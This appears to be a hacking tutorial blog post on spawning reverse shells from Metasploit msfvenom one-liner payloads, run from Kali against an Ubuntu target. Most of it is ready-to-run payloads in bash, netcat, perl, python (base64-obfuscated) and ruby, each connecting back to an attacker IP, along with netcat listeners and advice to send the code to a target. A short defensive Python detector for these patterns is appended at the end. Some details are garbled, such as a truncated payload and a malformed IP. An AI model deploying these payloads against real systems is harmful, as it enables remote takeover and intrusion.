Hello friends!! Today you will learn how to spawn a TTY reverse shell through netcat using the single-line (one-liner) payloads that ship with Metasploit, also known as stager exploits.
Basically there are two types of terminals: TTYs and PTYs. A TTY is the Linux/Unix terminal device for a hardwired terminal on a serial connection, attached to a mouse or keyboard, while a PTY is a pseudo-TTY, a copy of a terminal provided over a network connection such as SSH or telnet.
Let’s start!!
Attacker: Kali Linux
Target: Ubuntu
Open a terminal in your Kali Linux and type msfconsole to load the Metasploit framework. Now list all one-liner payloads for UNIX systems with the search command given below; it dumps every payload that can be used to compromise a UNIX system.
search cmd/unix
In the image below you can see that it has dumped all payloads that can be used to compromise a UNIX system. In this tutorial we are going to use some of these payloads to spawn a TTY shell.
Compromise Bash shell
In order to compromise a bash shell you can use the reverse_bash payload with msfvenom as given in the command below.
msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.103 lport=1111 R
Here we entered the following details to generate the one-liner raw payload.
-p: type of payload you are using, i.e. cmd/unix/reverse_bash
lhost: listening IP address, i.e. the Kali Linux IP
lport: listening port number, i.e. 1111 (any port number not used by other services)
R: output the payload in raw format
As shown in the image below, the size of the generated payload is 67 bytes. Now copy this malicious code and send it to the target, then start netcat to receive the reverse connection and wait for the TTY shell.
For example, when the target runs the following malicious code in a terminal, the attacker gets a reverse shell through netcat.
0<&121-;exec 121<>/dev/tcp/192.168.1.103/1111;sh <&121 >&121 2>&121
nc -lvp 1111
As you can observe from the result in the image below, the attacker has successfully obtained a TTY shell on the target system and can now do whatever he wishes.
For example:
whoami: tells you that you are the root user of the system you have compromised.
Compromise Netcat shell
In order to compromise a netcat shell you can use the reverse_netcat payload with msfvenom as given in the command below.
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.103 lport=2222 R
Here we entered the following details to generate the one-liner raw payload.
-p: type of payload you are using, i.e. cmd/unix/reverse_netcat
lhost: listening IP address, i.e. the Kali Linux IP
lport: listening port number, i.e. 2222 (any port number not used by other services)
R: output the payload in raw format
As shown in the image below, the size of the generated payload is 104 bytes. Now copy this malicious code and send it to the target, then start netcat to receive the reverse connection and wait for the TTY shell.
When the target runs the generated malicious code in a terminal (it begins as shown below), the attacker gets a reverse shell through netcat.
mkfifo /tmp/admoszx; nc 192.168.1.103 2222 0
nc -lvp 2222
As you can observe from the result in the image below, the attacker has successfully obtained a TTY shell on the target system.
Compromise Perl shell
In order to compromise a perl shell you can use the reverse_perl payload with msfvenom as given in the command below.
msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.103 lport=3333 R
Here we entered the following details to generate the one-liner raw payload.
-p: type of payload you are using, i.e. cmd/unix/reverse_perl
lhost: listening IP address, i.e. the Kali Linux IP
lport: listening port number, i.e. 3333 (any port number not used by other services)
R: output the payload in raw format
As shown in the image below, the size of the generated payload is 232 bytes. Now copy this malicious code and send it to the target, then start netcat to receive the reverse connection and wait for the TTY shell.
Again, when the target runs the following malicious code in a terminal, the attacker gets a reverse shell through netcat.
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.103:3333");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
nc -lvp 3333
As you can observe from the result in the image below, the attacker has successfully obtained a TTY shell on the target system. Here we found the target IP address, 192.168.1.1106, by executing the ifconfig command in the TTY shell.
Compromise Python shell
In order to compromise a python shell you can use the reverse_python payload with msfvenom as given in the command below.
msfvenom -p cmd/unix/reverse_python lhost=192.168.1.103 lport=4444 R
Here we entered the following details to generate the one-liner raw payload.
-p: type of payload you are using, i.e. cmd/unix/reverse_python
lhost: listening IP address, i.e. the Kali Linux IP
lport: listening port number, i.e. 4444 (any port number not used by other services)
R: output the payload in raw format
As shown in the image below, the size of the generated payload is 533 bytes. Now copy this malicious code and send it to the target, then start netcat to receive the reverse connection and wait for the TTY shell.
Again, when the target runs the following malicious code in a terminal, the attacker gets a reverse shell through netcat. The payload is a base64-encoded Python script wrapped in exec(...decode('base64')).
python -c "exec('aW1wb3J0IHNvY2tldCAgICAgICAgICwgICAgICAgIHN1YnByb2Nlc3MgICAgICAgICAsICAgICAgICBvcyAgICAgOyAgICAgIGhvc3Q9IjE5Mi4xNjguMS4xMDMiICAgICA7ICAgICAgcG9ydD00NDQ0ICAgICA7ICAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgICAgICAgLCAgICAgICAgc29ja2V0LlNPQ0tfU1RSRUFNKSAgICAgOyAgICAgIHMuY29ubmVjdCgoaG9zdCAgICAgICAgICwgICAgICAgIHBvcnQpKSAgICAgOyAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAgICwgICAgICAgIDApICAgICA7ICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICAgLCAgICAgICAgMSkgICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgICAsICAgICAgICAyKSAgICAgOyAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"
nc -lvp 4444
As you can observe from the result in the image below, the attacker has successfully obtained a TTY shell on the target system and can now do whatever he wishes.
For example:
ifconfig: shows the IP configuration of the system you have compromised.
Compromise Ruby shell
In order to compromise a ruby shell you can use the reverse_ruby payload with msfvenom as given in the command below.
msfvenom -p cmd/unix/reverse_ruby lhost=192.168.1.103 lport=5555 R
Here we entered the following details to generate the one-liner raw payload.
-p: type of payload you are using, i.e. cmd/unix/reverse_ruby
lhost: listening IP address, i.e. the Kali Linux IP
lport: listening port number, i.e. 5555 (any port number not used by other services)
R: output the payload in raw format
As shown in the image below, the size of the generated payload is 131 bytes. Now copy this malicious code and send it to the target, then start netcat to receive the reverse connection and wait for the TTY shell.
Again, when the target runs the following malicious code in a terminal, the attacker gets a reverse shell through netcat.
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.103","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
As you can observe from the result in the image below, the attacker has successfully obtained a TTY shell on the target system and can now do whatever he wishes.
For example:
ifconfig: shows the IP configuration of the system you have compromised.
Compromise bin/sh shell
In order to compromise a command shell you can use the reverse_netcat_gaping payload with msfvenom as given in the command below.
msfvenom -p cmd/unix/reverse_netcat_gaping lhost=192.168.1.103 lport=6666 R
Here we entered the following details to generate the one-liner raw payload.
-p: type of payload you are using, i.e. cmd/unix/reverse_netcat_gaping
lhost: listening IP address, i.e. the Kali Linux IP
lport: listening port number, i.e. 6666 (any port number not used by other services)
R: output the payload in raw format
As shown in the image below, the size of the generated payload is 533 bytes. Now copy this malicious code and send it to the target, then start netcat to receive the reverse connection and wait for the TTY shell.
In order to reach the bin/sh shell of the target system and obtain a TTY shell, we first accessed a PTY terminal on the target through SSH and then pasted the malicious code below into that PTY terminal.
nc 192.168.1.103 6666 -e /bin/sh
nc -lvp 6666
From the image below you can observe that we successfully obtained a TTY shell on the target system.
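As an added defender-side example (not part of the original post), the following Python scans constructed process-creation records for the tell-tale pieces of the six one-liners above: the /dev/tcp redirection, mkfifo with nc, nc -e /bin/sh, the Perl IO::Socket::INET loop, the base64-wrapped Python socket/dup2 code, and the Ruby TCPSocket loop. The record format, the RULES needles and the sample records are my own assumptions.

```python
import base64
import re

# Detection rules keyed by the msfvenom payload family shown in the post; every needle must appear.
RULES = {
    "cmd/unix/reverse_bash": ["/dev/tcp/", "exec "],
    "cmd/unix/reverse_netcat": ["mkfifo", "nc "],
    "cmd/unix/reverse_netcat_gaping": ["nc ", "-e /bin/sh"],
    "cmd/unix/reverse_perl": ["perl", "IO::Socket::INET", "system"],
    "cmd/unix/reverse_python": ["socket", "dup2", "subprocess"],
    "cmd/unix/reverse_ruby": ["ruby", "TCPSocket", "IO.popen"],
}
# The exec('<base64>'.decode('base64')) wrapper used by the python payload.
B64_EXEC = re.compile(r"exec\('([A-Za-z0-9+/=]+)'\.decode\('base64'\)\)")

def expand_base64(cmdline):
    """Inline the decoded exec() argument so the rules see real calls, not a blob."""
    def repl(m):
        try:
            return base64.b64decode(m.group(1)).decode("ascii", "replace")
        except ValueError:
            return m.group(0)
    return B64_EXEC.sub(repl, cmdline)

def classify(cmdline):
    """Return the payload family a command line resembles, or None."""
    text = expand_base64(cmdline)
    for family, needles in RULES.items():
        if all(n in text for n in needles):
            return family
    return None

def scan(records):
    """records are 'pid=<n> cmd=<command line>' strings; returns [(pid, family)]."""
    hits = []
    for rec in records:
        pid, _, cmd = rec.partition(" cmd=")
        family = classify(cmd)
        if family:
            hits.append((pid[len("pid="):], family))
    return hits

# Constructed sample telemetry (not real captures): a benign nc port check plus shortened stand-ins.
SAMPLE = [
    "pid=101 cmd=nc -zv 192.168.1.1 22",
    "pid=103 cmd=sh -c exec 121<>/dev/tcp/192.168.1.103/1111;sh <&121 >&121 2>&121",
    "pid=104 cmd=nc 192.168.1.103 6666 -e /bin/sh",
    "pid=105 cmd=python -c \"exec('%s'.decode('base64'))\""
    % base64.b64encode(b"import socket,subprocess,os;os.dup2(0,0)").decode(),
]
```

Substring rules like these are cheap to evade by renaming or re-encoding, so treat a hit as a trigger for process-ancestry and network-connection review rather than as proof on its own.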